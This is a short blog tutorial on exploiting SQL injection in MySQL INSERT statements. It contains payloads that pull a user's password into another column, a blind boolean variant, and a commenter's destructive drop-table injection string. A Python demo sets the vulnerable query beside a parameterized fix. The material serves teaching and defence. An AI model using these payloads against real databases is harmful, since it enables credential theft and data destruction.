Exploiting SQL Injections In Insert Statements

October 7, 2007

Exploiting SQL injections in INSERT statements is not trivial, because most of the time you do not directly see the output of the injected query.

Unlike MS-SQL, MySQL generally does not support running multiple (stacked) queries in one call, which is a common trick for exploiting SQL injection when the backend database is MS-SQL.

----------------------------------------

Example 1 

Let's consider a vulnerable example, the injection point being $id (an integer field) in the following statement:-

insert into secret values($id, 'Welcome');

----------------------------------------

Exploit 

insert into secret values(1000, (select passwd from users where id=1))#, 'Welcome');

The '#' (the MySQL line-comment marker) comments out the rest of the query, so the password from users ends up in the 'Welcome' column of secret.

----------------------------------------

Example 2: Blind Injection

Scenario:- the injection is in the last column of the query, which is an integer field, so an attacker cannot directly select a password into it.

Query:- insert into secret values('WELCOME', $id);

Exploit:-

insert into secret values('WELCOME', (select if (passwd ='mypass',1,0) from users where id=1))#);

----------------------------------------

If 'magic_quotes' is enabled (so quotes in the input are escaped and string literals like 'mypass' cannot be used), one can use functions like ascii() and substr() to exploit it instead.

Question:- Can you exploit the above (Example 2) if $id happens to be a string field? Let us know how! :)
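As an added example (not code from the original post), here is the vulnerable pattern from Example 1 beside its parameterized fix, so the difference is visible in the stored rows. An in-memory sqlite3 database stands in for MySQL (the schema and data are constructed), and the payload uses '--' where MySQL would accept '#', since sqlite does not recognise '#'.

```python
import sqlite3

# Constructed sample schema and data; sqlite3 in-memory stands in for the
# post's MySQL backend, so '--' is used where MySQL would accept '#'.
SAMPLE_SCHEMA = """
CREATE TABLE users(id INTEGER, passwd TEXT);
CREATE TABLE secret(id INTEGER, note TEXT);
INSERT INTO users VALUES (1, 'mypass');
"""

# The post's Example 1 payload for $id, with '--' replacing '#'.
PAYLOAD = "1000, (select passwd from users where id=1))--, 'Welcome')"


def new_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SAMPLE_SCHEMA)
    return con


def insert_vulnerable(con, user_id):
    """The pattern from the post: $id is pasted straight into the SQL text,
    so whatever it contains becomes part of the statement."""
    sql = "insert into secret values(%s, 'Welcome')" % user_id
    con.execute(sql)
    return con.execute("select id, note from secret").fetchall()


def insert_safe(con, user_id):
    """Hardened form: the value is bound as a parameter. The driver never
    parses it as SQL, so the subselect is stored as an inert string."""
    con.execute("insert into secret values(?, 'Welcome')", (user_id,))
    return con.execute("select id, note from secret").fetchall()


if __name__ == "__main__":
    print("vulnerable:", insert_vulnerable(new_db(), PAYLOAD))
    print("safe:      ", insert_safe(new_db(), PAYLOAD))
```

With the vulnerable builder the password lands in the note column; with the bound parameter the whole payload is stored verbatim and nothing from users is read. For an integer column, converting the input with int() before binding rejects such payloads outright.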

Comments

1 Comment

  • Arvind says:

    A late comment but one nonetheless 😉 . Say there's a situation where there is just 1 field which is vulnerable to SQL Injection and the query passed to the DB is an Insert query…just like you mentioned here. For simplicity let's say it's numeric like you say. Let's say it's PHP-MySQL (so no stacked queries) like admin';drop table blah#

    Now what's the max that can be done by an attacker here? The way I see it he can:
    — By crafting a SELECT query like you mention, detect that a dynamic query is being used. Hence be able to insert the result of the SQL query as a value which is part of the Insert query.

    — However there is no way he can select data from other tables whose name he does not know and cannot enumerate. So unless you guess tables etc. there isn't much you can do..right?

    Is there something I have missed?

    Thanks
    Arvind
